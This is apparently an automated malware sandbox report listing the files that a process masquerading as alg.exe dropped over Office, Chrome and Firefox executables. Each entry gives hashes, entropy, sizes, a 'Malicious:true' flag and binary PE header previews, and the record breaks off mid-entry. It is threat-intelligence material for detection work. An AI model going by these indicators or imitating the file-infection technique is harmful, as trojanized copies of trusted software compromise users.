                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):5855744
                                                                                                                                                Entropy (8bit):6.574337433539904
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:98304:4ALuzDKnxCp3JKNrPJzruaI6HMaJTtGbmD527BWG:DaGg3cFPIaI6HMaJTtGbmVQBWG
                                                                                                                                                MD5:86DD2C2596E94D99EA4F914ECA3BEB2E
                                                                                                                                                SHA1:1F41D94C9FDBBBF57C5F6FDFC4A74E814D2DB297
                                                                                                                                                SHA-256:FFDF417CEFC1B3857D0F353F395A9CF8F526E6305D53E2939D68641D7F4FBC8C
                                                                                                                                                SHA-512:5B434A36391DE84C52E7251BC7B9C9E0043FE78E54C96024244E16B751C90298E5BA62EE4EA4E8D99C7589B645713B9EDFE2C05EE3E6328F4CEE8FF295526600
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......Jc.M.............p......nx......nx......).......)........p.......p.......p..&....p..............nx..i...kx......kx......kx..g...kxx.............kx......Rich....................PE..d....".e..........".... .z6..........32........@..............................Y......=Z... .................................................8.B.......K..a...PI..%..................0.B.8...................X.B.(.....7.@.............6.0.....B......................text....y6......z6................. ..`.rdata..5.....6......~6.............@..@.data...`....0G.......G.............@....pdata...%...PI..&...:I.............@..@.didat.. .....K......`K.............@..._RDATA..\.....K......fK.............@..@.rsrc....a....K..b...hK.............@..@.reloc........P.......O.............@...................................................................................................................

                                                                                                                                                C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1312768
                                                                                                                                                Entropy (8bit):5.356073582048154
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:SXr/SVMxWssqjnhMgeiCl7G0nehbGZpbD:K1xtDmg27RnWGj
                                                                                                                                                MD5:84CAB97774BA47A1B2ACDDB4B7F3887E
                                                                                                                                                SHA1:DDA8E9C4EE1470EFE7544AC3F8B1374EE31CFF11
                                                                                                                                                SHA-256:BCB30E6C0A3B59E6622196ED2E345952D9312AC0BDEC39382E93BA07D964C37B
                                                                                                                                                SHA-512:E6A196F1A5FFE031DB5879C44F2BCC7EDC9E837E3126EF21CE043AC4E566F657BC783C03B3C8CED3D5A9172559A21389E17313526482644933A92F9F732EDDDD
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........K.k...k...k.......k.......k.......k.......k...k..Ro.......k....l..k.......k....n..k.......k..Rich.k..........PE..L...9.A/.....................T......@V............@..........................P.......2........... ......................................8............................_..T...............................@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...8...........................@..@.reloc...p.......`..................@...........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):27533312
                                                                                                                                                Entropy (8bit):6.248637468991982
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:196608:ZhRrmpGpGdJM7Hbp8JfrCGvqYYuNDmoefAlprtPz25HqaI6HMaJTtGbQOyVQBWG:ZhRCpGpMJMrbp8JjpNdNlc5CB
                                                                                                                                                MD5:F8257C7A33203E87EDEC9770001CA94B
                                                                                                                                                SHA1:8C4AC04984437932D1927B92FB0500DEE3EC4E36
                                                                                                                                                SHA-256:EC07CF50C031EFC5940BAE27F8FD0BB581AB5815378351FDEC2E86AF405DE3DD
                                                                                                                                                SHA-512:6A2EB107D6A25B24F777CFA8E82133669B990D520BB5EDB24DE52E97EF1A6D8E771134A05D7F0A2BF136EEB6566D6FA54BCF384386CE09ACAD8C1DA13386F5FC
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...................................H...........!..L.!This program cannot be run in DOS mode....$.......$.|+`{.x`{.x`{.xi..xv{.x...yf{.x...yj{.x...yd{.x...yO{.xG..xh{.xG.oxa{.x...yb{.x...ya{.x...ya{.x...yd{.x...yc{.x...y~{.x...y}{.x`{.xTs.x...ya{.x...yjz.x...y v.x...xa{.x`{.xa{.x...ya{.xRich`{.x........PE..d......e..........".... .....H.................@.......................................... ..................................................u..D.... ?...X...7.........................8....................U..(...`...@............0.. "..l .......................text............................... ..`.rdata..S.~..0....~.................@..@.data.........1.......0.............@....pdata........7.......7.............@..@.didat..`.....>.......>.............@....detourc.!....>.."....>.............@..@.rsrc.....X.. ?...X...>.............@..@.reloc..............................@...........................................................................................

                                                                                                                                                C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):2199552
                                                                                                                                                Entropy (8bit):6.7890281166871045
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:49152:v83pZ3kd0CuEeN0LUmRXzYs65maDmg27RnWGj:3KuUQY15pD527BWG
                                                                                                                                                MD5:B773751366A73FC688FC4F1D5B413680
                                                                                                                                                SHA1:4B5C5CD3D62DE5E2029063A2082D0A33B26717EF
                                                                                                                                                SHA-256:44A31541079853DC972DD4840EA7D568630FBF83F889DD9F8CE092E3B5506BFB
                                                                                                                                                SHA-512:D3BCCA447892129A30B9659ADE90272631B7A7C7B21EDCF163A13C9801C451734DAFD6E15AE8E31E1E188D111F796869B969EA7A7AC6EE86DB04F4E4AAD324E1
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D................7......................!..............~............Y.......[............Rich............PE..d...rq............"..................$.........@..............................!......!... .......... ......................................P...|....p... ......L....................a..T...................Xt..(... s..8............t...............................text...6........................... ..`.rdata..............................@..@.data...@...........................@....pdata..L...........................@..@.rsrc.... ...p...0...P..............@..@.reloc... ..........................@...................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):4971008
                                                                                                                                                Entropy (8bit):6.670841207145855
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:49152:2Erw1zDb1mZtOoGpDYdSTtWXy4eqH8nYAmoBvYQugWupoI6bAGOpndOPcptz6+MZ:oA4oGlcR+glEdOPKzgVZ4D527BWG
                                                                                                                                                MD5:87FC6350D8215CD1303BDD5B0B6D6638
                                                                                                                                                SHA1:50FFA0F8B4A97B8066C99AEC746AB40131A819C7
                                                                                                                                                SHA-256:CDEB33B9C48C6EAD81657CFB20371596351D9DD56FB11128E4C221846656777C
                                                                                                                                                SHA-512:56E58840B3C646E74E5318ADBBD1C29AC737108A2FC5B628AB0E0C9889209E052DCFD98B88B8C13CACD2FB056381F9CFF8F36F0FED29EDB5A2CEC9A2F87A4B11
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......Eh.<..{o..{o..{o.q.o..{oaszn..{oas~n*.{oas.n..{oasxn..{o.{}n..{o.{xn..{o.{.n..{o.{zn..{o..zo..{odsxn..{ods~n..{odsrnF.{ods.o..{o...o..{odsyn..{oRich..{o........PE..d...0m.d..........".... ..-.........0p+........@..............................L.....GuL... .................................................HZ:.......B.......@.<C....................:.8...................p.9.(... P..@.............-......H:.@....................text...[.-.......-................. ..`.rdata..9.....-.......-.............@..@.data...x....`>......>>.............@....pdata..<C....@..D....@.............@..@.didat..`.....B......LB.............@....rsrc.........B......PB.............@..@.reloc........B......ZB.............@...........................................................................................................................................................................

                                                                                                                                                C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):4897792
                                                                                                                                                Entropy (8bit):6.829775770838265
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:49152:X8ErxqTGsitHloGgkiDrCvJVZfEcpwD06LgVCM2hnwLNwiHaGI3Y/685ZYMaWgK6:mv2gM+qwXLg7pPgw/DSZHqD527BWG
                                                                                                                                                MD5:BC448FFEF3FEBCCC4500445186100CEC
                                                                                                                                                SHA1:7CE7B3B8820977AC707ED13A999357BD32A04A0C
                                                                                                                                                SHA-256:B7EBE1F61CB1899EE5D951B4BF58058D9BE4B8F5F728430FF0ED0AF7B9F86E8D
                                                                                                                                                SHA-512:8ACFC7B5C969D4295561F7C9D9DFADD0E568D6E8D6156D64EBCA633E980B7FC85A1E4EB659D86A49E9CB2874FF230C4F957224D192BC712E5B7C6EC94D06C977
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."......D/......... ..........@..............................L.......J... ...........................................6.N.....6.......<......P:.l.....................6......................6.(...`s/.@.............6.8.....6.@....................text....C/......D/................. ..`.rdata......`/......H/.............@..@.data...4:....8.......7.............@....pdata..l....P:.......9.............@..@.00cfg..0.....;.......:.............@..@.gxfg....1....;..2....:.............@..@.retplne.....0<.......:..................tls....A....@<.......:.............@...CPADinfo8....P<.......:.............@...LZMADEC......`<.......:............. ..`_RDATA..\.....<.......:.............@..@malloc_h......<.......:............. ..`.rsrc.........<.......:.............@..@.reloc... ...`C.......A.............@...........................................................

                                                                                                                                                C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):4897792
                                                                                                                                                Entropy (8bit):6.829774012050522
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:49152:/8ErxqTGsitHloGgkiDrCvJVZfEcpwD06LgVCM2hnwLNwiHaGI3Y/685ZYMaWgK6:Ov2gM+qwXLg7pPgw/DSZHqD527BWG
                                                                                                                                                MD5:467DBD53BCC8B2AD5F9A8529C056D979
                                                                                                                                                SHA1:B4785151FC0A0A2F379AF30728B2B0A5992FAF2B
                                                                                                                                                SHA-256:DA340CEBC178300A97902ED86C8177241E7F513B5AC7EF22EFCF563A34E28221
                                                                                                                                                SHA-512:6770D04ACFB3F8422A04BCDDCEDE02C6FE28EA57A55A94E1D56B542D95F8DF3764A2736FB35943F74CCD52EA424270354023099AFF1651D8683FC0001A9B6E02
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."......D/......... ..........@..............................L.....8.K... ...........................................6.N.....6.......<......P:.l.....................6......................6.(...`s/.@.............6.8.....6.@....................text....C/......D/................. ..`.rdata......`/......H/.............@..@.data...4:....8.......7.............@....pdata..l....P:.......9.............@..@.00cfg..0.....;.......:.............@..@.gxfg....1....;..2....:.............@..@.retplne.....0<.......:..................tls....A....@<.......:.............@...CPADinfo8....P<.......:.............@...LZMADEC......`<.......:............. ..`_RDATA..\.....<.......:.............@..@malloc_h......<.......:............. ..`.rsrc.........<.......:.............@..@.reloc... ...`C.......A.............@...........................................................

                                                                                                                                                C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):2156544
                                                                                                                                                Entropy (8bit):6.953594192224767
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:4tjqL8fH+8aUbp8D/8+xyWAtsqjnhMgeiCl7G0nehbGZpbD:0jKK+81FI/8zHDmg27RnWGj
                                                                                                                                                MD5:902733A891C7CA18F1987FDF39D362C4
                                                                                                                                                SHA1:533581AEC13C8C1FA93E247E579736C48FDE12B8
                                                                                                                                                SHA-256:DFD3A57FBA5FE28E3C608DCBB494BA6780CEBECF348DADA5FD11F0E3BAE8C101
                                                                                                                                                SHA-512:0A3F9F79A00602E1DCE8642E0981E5DE9730CDADCE58C69A94328E47DCBADE264B0B3C9F227C8C1002E784B45B43D0FD98F040D034981785ECE022066979128F
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."......F.....................@.............................P"......'!... ..........................................X..\...$Y....... ...&......(...................lM......................PL..(...pr..@............_...............................text....D.......F.................. ..`.rdata..$....`.......J..............@..@.data...,.... ......................@....pdata..(...........................@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne.................................tls................................@...LZMADEC............................. ..`_RDATA..\...........................@..@malloc_h............................ ..`.rsrc....&... ...(..................@..@.reloc.......P......................@...................................................................................................

                                                                                                                                                C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):2370560
                                                                                                                                                Entropy (8bit):7.03240732510139
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:49152:OAMsOu3JfCIGnZuTodRFYKBrFDbWphDmg27RnWGj:OAMa38ZuTS4D527BWG
                                                                                                                                                MD5:FF8BB2838569EC3B48228B14FDD77FA5
                                                                                                                                                SHA1:393B69AEF1F6BD059B2431613811E3960F96376A
                                                                                                                                                SHA-256:7E547ED54AB013A139FA8116E68032AA9A2C53F854B2E971E19501861AC9FF18
                                                                                                                                                SHA-512:A6E87AB3070235F49CFB605BB5C930B128F7628983B2F3DDE55702825187A77B4550CF31129B0189F53877D17D9EFD275B36E5A93BD85E737332DB5A94D8BBA1
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e..........".................0..........@..............................%......&%... ..........................................}..Z...Z}...............@..`...................$k.......................j..(.......@............... ............................text...V........................... ..`.rdata..Hv.......x..................@..@.data...t....`.......>..............@....pdata..`....@.......6..............@..@.00cfg..0...........................@..@.gxfg....+.......,..................@..@.retplne.....@...........................tls....A....P......................@..._RDATA..\....`....... ..............@..@malloc_h.....p.......".............. ..`.rsrc................$..............@..@.reloc...............<..............@...........................................................................................................................................

                                                                                                                                                C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1984512
                                                                                                                                                Entropy (8bit):7.104351504833686
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:gwbK7tnhD4aH6wD2Krx5NgOOagQE8JZsqjnhMgeiCl7G0nehbGZpbD:gSK7Fhslq2EPfOGEkDmg27RnWGj
                                                                                                                                                MD5:E1004DD0B7AEE52F020F9869D1331BA4
                                                                                                                                                SHA1:50F9C0DD87AA1F852FEE3146F0EF0B437DE75D5D
                                                                                                                                                SHA-256:8177C7B7B585077A67924843DCE510B6F7A6E690C893C43C063BC87DCB2805BD
                                                                                                                                                SHA-512:CA56F4B91135C42F5CE5D6C64B25AEFC52DF3832C19D6CB9236C3CC5E14693FD479807FACFBB442BBB5087A73583C4DEDD468B2BB7DB685D589937845C863E40
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."............................@.......................................... ............................................\...$................p..t...............................................(...P...@...........x...x............................text............................... ..`.rdata..............................@..@.data................z..............@....pdata..t....p.......x..............@..@.00cfg..0...........................@..@.gxfg...@-... ......................@..@.retplne.....P.......D...................tls.........`.......F..............@...CPADinfo8....p.......H..............@..._RDATA..\............J..............@..@malloc_h.............L.............. ..`.rsrc................N..............@..@.reloc...............X..............@...................................................................................................

                                                                                                                                                C:\Program Files\Google\Chrome\Application\chrome_proxy.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1779712
                                                                                                                                                Entropy (8bit):7.158082935196321
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:DKI7Twj5KDHxJ1FxyD+/wsG18bbQpsqjnhMgeiCl7G0nehbGZpbD:Dv7e0j31mD+/wDGbODmg27RnWGj
                                                                                                                                                MD5:982EBD8B8FEB06B328EA7586DBCF26F9
                                                                                                                                                SHA1:D7D8DDD4B1933AA9F722408C3F4A9EE3BA1871C7
                                                                                                                                                SHA-256:9A8751B9E0E2F41AF1B19C0C08717C98B12E6F6E015A5CEC0A4A346658B76665
                                                                                                                                                SHA-512:9C175F5F3F90CA91C3C17448A95401FD3A7B7E5BB2B525C147D0F9E0C8F9CA02121C6C8E0C8FC280F8DB4C43D2FC54D974C919D62855174E1D98F7F17908190C
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."..........B.................@.....................................^.... .........................................X...U...............x....p.................................................(...`2..@...............X............................text............................... ..`.rdata..,w... ...x..................@..@.data...............................@....pdata......p.......x..............@..@.00cfg..0...........................@..@.gxfg....).......*..................@..@.retplne.....@.......&...................tls.........P.......(..............@..._RDATA..\....`.......*..............@..@malloc_h.....p.......,.............. ..`.rsrc...x...........................@..@.reloc...............8..............@...........................................................................................................................................

                                                                                                                                                C:\Program Files\Mozilla Firefox\crashreporter.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1378304
                                                                                                                                                Entropy (8bit):5.377446724572037
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:DQUVPDHhSWXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kw:UyhSWsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:9F1CC5EEBCC36742E89B7D16AB3CEE2E
                                                                                                                                                SHA1:7B5E4303DD20E26B1AF90D3109B852E71C29BE43
                                                                                                                                                SHA-256:7B7DBAA892C682A8CFA40106CC12E260D8AF00E491C20B481C4C1F439C0E55E8
                                                                                                                                                SHA-512:02E5003BAF4292D167338BBB58C8691802C29FC775E91B21BF1FC59BA6A04A6F1AE064D3CA94537012482E7CBFE6483700889B50390ECE2588A61AB0AD650305
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."............................@.............................p......^..... ..................................................................P......................T...........................(...p...8...........H................................text............................... ..`.rdata...h.......j..................@..@.data........@......................@....pdata.......P.......0..............@..@.00cfg..(....`.......@..............@..@.tls.........p.......B..............@....voltbl..............D...................rsrc................F..............@..@.reloc...P... ...@..................@...................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Program Files\Mozilla Firefox\default-browser-agent.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1286656
                                                                                                                                                Entropy (8bit):7.222138928229475
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:MsFfc1VyFn5UQn652bO4HxsqjnhMgeiCl7G0nehbGZpbD:MsFcIn5rJTDmg27RnWGj
                                                                                                                                                MD5:4DB6C700F63003CE04146C2ED6BA037E
                                                                                                                                                SHA1:63821F6E7A6A59E7EC8EDA931DB659322D381547
                                                                                                                                                SHA-256:B80D9B5E324C50FCE7CB0ED19789D6D2CA1604D9D7BBF067F36F80AD31B9BDE3
                                                                                                                                                SHA-512:33A98BFBDBA4ED225A5B91AB18B3571FDDD25D143B981B6A8A68D018B7F74B7ADE977EB6FC7B1BF236BD766AFC2E0E1D02BE9CA25269F34B040E455A1A59F563
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......6..........pX.........@....................................{).... ..........................................J.......K..........`........%..................DA..........................(...`...8............V...............................text...V5.......6.................. ..`.rdata...O...P...P...:..............@..@.data...............................@....pdata...%.......&..................@..@.00cfg..(...........................@..@.tls................................@....voltbl..................................rsrc...`...........................@..@.reloc....... ......................@...................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Program Files\Mozilla Firefox\firefox.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1246208
                                                                                                                                                Entropy (8bit):7.494293942642746
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:xt9o6p4xQbiKI69wpemIwpel9ysqjnhMgeiCl7G0nehbGZpbD:xt9faQbtl2peapelMDmg27RnWGj
                                                                                                                                                MD5:CC3F19ED21EA52CFCC726F4A8093CC3D
                                                                                                                                                SHA1:A4D69E95AD0308B63B72EC9DE57F146DADB86F0D
                                                                                                                                                SHA-256:285627006524CC2F6BEF4956F4B1E9CB2D1DC7493B04480536097CF7273E9516
                                                                                                                                                SHA-512:8DAFFF2E6E085BCB9FD34DC35D9D48BC2276E4C4B7312006218B3B1AA21C67EE4BDB94AC34C87F508D64141D93D3EC492A8684A44BD29CEAA44C060913680895
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......$.....................@.....................................Y.... .................................................g...h............P..t%..................4........................k..(....@..8...........P...........@....................text....".......$.................. ..`.rdata.......@.......(..............@..@.data...p+... ......................@....pdata..t%...P...&..................@..@.00cfg..(............2..............@..@.freestd.............4..............@..@.retplne$............6...................tls.................8..............@....voltbl..............:...................rsrc................<..............@..@.reloc...............$..............@...................................................................................................................................................................................

                                                                                                                                                C:\Program Files\Mozilla Firefox\maintenanceservice.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1356800
                                                                                                                                                Entropy (8bit):5.347852399510411
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:8QVTZu0JpsqjnhMgeiCl7G0nehbGZpbD:TVTZucDmg27RnWGj
                                                                                                                                                MD5:E005B0372AA3AAEF18DAF5F0C8C35597
                                                                                                                                                SHA1:2DA86045643ACCB96A36283B7E8BB85645716E01
                                                                                                                                                SHA-256:C30FF5F2839605834AA9F0D2C10313393EBF04F3081513C6883FEA214D60AACA
                                                                                                                                                SHA-512:C448D518570F090BB1560B9B7796FCD0D10082D060970D7C461EC5CCC4C08AE7E3AC269F6F2D37E897419340EBDC18971575C0CFE224AC67C98BEC7CDFA27B36
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......R...$.................@.............................P............ .................................................h&..................`....................$..........................(....p..8............,...............................text...FQ.......R.................. ..`.rdata.......p.......V..............@..@.data...4#...`.......<..............@....pdata..`............J..............@..@.00cfg..(............d..............@..@.tls.................f..............@....voltbl.*............h.................._RDATA...............j..............@..@.rsrc................l..............@..@.reloc...P.......@...t..............@...........................................................................................................................................................................................................................

                                                                                                                                                C:\Program Files\Mozilla Firefox\minidump-analyzer.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1344000
                                                                                                                                                Entropy (8bit):6.808380259200985
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:KC1vpgXcZHz/sqjnhMgeiCl7G0nehbGZpbD:KC1vpIcNjDmg27RnWGj
                                                                                                                                                MD5:D5ECD04F55E40E8DF98357450DF31CBC
                                                                                                                                                SHA1:F599CB991A0DA895E12A51BC963B3AD11C592B48
                                                                                                                                                SHA-256:1B8914DD73A8B9CCFBC8F34C3EEC2946CBB1A30F14ADEE6E421E9FC3DD5A1A38
                                                                                                                                                SHA-512:62CDD2F43A554C705DC5FA33F513C406C33D14A89893A0156277B320C7FD0A8CE72C952074E824E9DB02E9515FD95652F64638D0936BECE7B1A6250B2C648228
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......T...H......0..........@....................................C..... .........................................................................................T........................r..(....p..8...............`............................text...fS.......T.................. ..`.rdata.......p.......X..............@..@.data....2...@...,..."..............@....pdata...............N..............@..@.00cfg..(............d..............@..@.tls.................f..............@....voltbl..............h...................rsrc................j..............@..@.reloc... ...........r..............@...................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Program Files\Mozilla Firefox\pingsender.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1200128
                                                                                                                                                Entropy (8bit):5.140036718079791
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:tSwj7Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:tv7sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:FE12125D8E2C682EF63286BD73A646E9
                                                                                                                                                SHA1:91733E94E5F4B1544A7E7C08E27C8A41EEA9E95F
                                                                                                                                                SHA-256:1F148D0566B940E547931270309B94D46117B09657228860EA8BB0271DEA15B1
                                                                                                                                                SHA-512:2A89125BC04A43663AA0644C9E9E29A7C40341626827A9824AB467AB4259FDBD89A36F4426445A8B23B4F726573C0CC389700565442D4E88E6C9C2D598DC4959
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."..........b......`..........@..................................... .... ..........................................................`....... .. ...................t...........................(.......8............................................text............................... ..`.rdata..dM.......N..................@..@.data...............................@....pdata.. .... ......................@..@.00cfg..(....0......................@..@.tls.........@......................@....voltbl......P...........................rsrc........`......................@..@.reloc...P...p...@..................@...................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Program Files\Mozilla Firefox\plugin-container.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1408512
                                                                                                                                                Entropy (8bit):5.441172758363981
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:KWKntIfGpZsqjnhMgeiCl7G0nehbGZpbD:98Ie7Dmg27RnWGj
                                                                                                                                                MD5:968FF8506CFCCD72BEC21E50A56F27E5
                                                                                                                                                SHA1:85FC79A3B534494ACDE52DE37E3F4CA70CDDA4A3
                                                                                                                                                SHA-256:532711A3C4D25E3606C2A5EDAFEC0B4C4D237FF50F8928007350FB011CE91E2A
                                                                                                                                                SHA-512:C7CD6FC8BCD3A2A2E99D3E9F537D5B07718A7F99C3F77D0DFAC90BC899FDADA5517F268010A0A12445421F6379660D31D3706F00FBFDD10B6BD7E5833863D3E9
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......~.....................@....................................Wa.... .....................................................@.......P....P.................................................(... ...8...................8........................text...w}.......~.................. ..`.rdata..,...........................@..@.data...0%... ......................@....pdata.......P......................@..@.00cfg..(....p.......*..............@..@.tls.................,..............@....voltbl..................................rsrc...P............0..............@..@.reloc...P.......@...>..............@...................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Program Files\Mozilla Firefox\private_browsing.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
